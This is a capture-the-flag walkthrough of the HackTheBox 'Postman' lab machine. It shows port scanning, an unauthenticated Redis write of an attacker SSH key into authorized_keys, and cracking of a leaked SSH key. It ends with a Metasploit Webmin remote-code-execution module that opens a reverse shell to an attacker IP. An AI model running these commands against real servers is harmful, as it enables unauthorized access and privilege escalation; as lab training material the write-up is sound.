Always stay close to what keeps you feeling alive!

HackTheBox Postman Machine Info Card

Postman is an easy difficulty machine running Linux. It tests your knowledge in OSINT, Redis exploitation and basic Privilege Escalation through a known exploit. There is nothing overly complicated about this machine as long as you stick to basic enumeration and don’t get too carried away.

Be sure to checkout the Basic Setup section before you get started.


Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.


portscan postman.htb
Grabbing ports...
Ports grabbed!
Starting Nmap 7.80 ( ) at 2019-12-02 06:11 PST
Nmap scan report for postman.htb (
Host is up (0.35s latency).

22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geeks Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesnt have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 43.36 seconds

From the output we see that we have a website on port 80 as well as redis on port 6379 and webmin on port 10000.

Directory Bruteforce

Doing a scan with Gobuster using the dir mode reveals some files and directories:

gobuster dir -u http://postman.htb -r -t 30 -w /usr/share/wordlists/dirb/big.txt -x .php,.txt,.html -o gobuster.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:            http://postman.htb
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html
[+] Follow Redir:   true
[+] Timeout:        10s
2019/12/02 06:16:32 Starting gobuster
/css (Status: 200)
/fonts (Status: 200)
/images (Status: 200)
/index.html (Status: 200)
/js (Status: 200)
/server-status (Status: 403)
/upload (Status: 200)
2019/12/02 06:22:02 Finished

An interesting find is the upload directory!


Let’s checkout the website at http://postman.htb:

Postman Main Screenshot

Nothing exciting. Let’s check the upload directory:

Postman Upload Directory Screenshot

We find nothing useful and cannot find an upload form. Let’s move on for now.


Checking exploitdb for anything useful we find the following vulnerability relating to our webmin version:

searchsploit webmin 1.910
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                    |  Path
                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)                                                                            | exploits/linux/remote/46984.rb
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

Taking a look at this exploit we see that it requires valid credentials.


Let’s do a quick test and see if we can access redis without credentials using the tool redis-cli:

redis-cli -h postman.htb -p 6379 set with_space 'boo'

Looks promising! We can connect with redis-cli -h postman.htb -p 6379 where we find that we can change various settings using the config set command.

Having redis installed on our local machine allows us to research how redis is installed and configured. We find that a user named redis is created and the home directory for this default user is /var/lib/redis. So far seems we can only write with save in /var/lib/redis so we will focus on that area.


After a quick web search we find a vulnerability with misconfigured redis servers which may allow us to login via SSH. If you remember from our nmap scan the ssh port 22 is open.

Let’s give this a try:

First we create an RSA key pair:

ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/
The key fingerprint is:
SHA256:BHSzzWs/IESstXc+Zseq/OVFX9JdCu0oJNeKdSZkMrs root@kali
The key's randomart image is:
+---[RSA 3072]----+
|     .o.* o      |
|       +o@ . .   |
|       o*.B = . .|
|      .o.B.*.+ oo|
|        E.*o..+ =|
|         o += ooo|
|           oo+. o|
|         .  .+ . |
|          oo. .  |

Now let’s take our key and put it in a text file with new lines either side. I am assuming this is needed for when we parse it with redis:

(echo -e "\n\n"; cat ~/.ssh/; echo -e "\n\n") > ssh.txt

We will now flush the Redis datastore:

redis-cli -h postman.htb flushall

And write the ssh.txt file we created in to a keystore on the Redis server via redis-cli command:

cat ssh.txt | redis-cli -h postman.htb -x set ssh

Now we will connect to the redis-server and set the dir option to /var/lib/redis/.ssh and confirm that the options have been updated successfully:

redis-cli -h postman.htb
postman.htb:6379> config set dir /var/lib/redis/.ssh
postman.htb:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"

We then set the name of the file we want to save to the dir location and check that the options have been updated successfully:

postman.htb:6379> config set dbfilename "authorized_keys"
postman.htb:6379> config get dbfilename
1) "dbfilename"
2) "authorized_keys"

Now for the moment of truth. Can we save our ssh key to the .ssh folder, let’s see:

postman.htb:6379> save

Yes we can. The file was saved successfully.

Now to try logging in via ssh:

ssh -i ~/.ssh/id_rsa -l redis postman.htb
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:
 * Management:
 * Support:

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
Last login: Mon Aug 26 03:04:25 2019 from

The first thing we notice is that there is no user.txt in the redis users home directory. A quick look in /home shows the directory Matt which contains the user.txt flag:

redis@Postman:~$ ls -l /home/Matt/user.txt 
-rw-rw---- 1 Matt Matt 33 Aug 26 03:07 /home/Matt/user.txt

We will need to get access to the Matt account.

Having a look around /var/lib/redis we can see there is the usual .bash_history file of which we have read access.

Viewing the contents we see commands that have been executed by Matt:

redis@Postman:~$ cat .bash_history 
su Matt
cat /etc/ssh/sshd_config 
su Matt
cd /var/lib/redis
su Matt
cat id_rsa.bak 

We quickly notice the file id_rsa.bak. We are obviously going with an ssh theme here.

Let’s do a search for the file:

redis@Postman:~$ find / -name id_rsa.bak 2>&1 | grep -v "Permission denied"

Nice. Let’s try and use it straight away and see if there is a passphrase:

redis@Postman:~$ ssh -i /opt/id_rsa.bak -l Matt localhost
Enter passphrase for key '/opt/id_rsa.bak': 

Looks like Matt isn’t a complete idiot.

We will need to crack the key. John The Ripper will work well for this because we will need to convert the key to a readable format and john can do just that with ssh2john:

python ~/Documents/postman/id_rsa.bak > ~/Documents/postman/id_rsa.hash

If you are using Kali you will find that ssh2john isn’t installed. You can download it from here.

Now let’s crack the hash:

john --wordlist=/root/Wordlists/passwords/passwords.txt id_rsa.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
com....08     (/root/Documents/postman/id_rsa.bak)
4g 0:00:02:44 DONE (2019-12-03 10:44) 0.02431g/s 1841Kp/s 1841Kc/s 1841KC/s 233091..hielox
Session completed

Ok I take back what I said. Matt’s an idiot! Now let’s try and login via ssh locally from the redis shell:

redis@Postman:~$ ssh -i /opt/id_rsa.bak -l Matt localhost
Enter passphrase for key '/opt/id_rsa.bak': 
Connection closed by ::1 port 22

Look’s like we have an issue. The passphrase worked but Matt may not be allowed to ssh in. This reminds me that there was a command in .bash_history where Matt was messing around with /etc/ssh/sshd_config the configuration file for the ssh server. Taking a look we can see Matt has logging in via ssh disabled:

redis@Postman:~$ cat /etc/ssh/sshd_config | grep DenyUsers
DenyUsers Matt

Let’s try the password with su instead:

redis@Postman:~$ su Matt

We can now grab the user flag in Matt’s home directory:

Matt@Postman:~$ cat user.txt

On to root!


Let’s go checkout the webmin exploit we saw earlier that required valid credentials may be the way to go.

One of those was Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) which is a Metasploit module:

msf5 > search type:exploit name:webmin package

Matching Modules

   #  Name                                     Disclosure Date  Rank       Check  Description
   -  ----                                     ---------------  ----       -----  -----------
   0  exploit/linux/http/webmin_packageup_rce  2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution

msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD com....08
PASSWORD => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost <attacker-ip>
lhost =>
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts postman.htb
rhosts => postman.htb
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 
[+] Session cookie: 501c01341b72936a3e2c8cc9db790a16
[*] Attempting to execute the payload...
[*] Command shell session 1 opened ( -> at 2019-12-03 11:02:32 -0800
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt

And we are done :)


This machine was straight forward with sufficient research to establish how things work. Misconfigured Redis servers have been a real issue in the past and can still be found today in the wild. Overall this was an enjoyable machine.

Hack The Box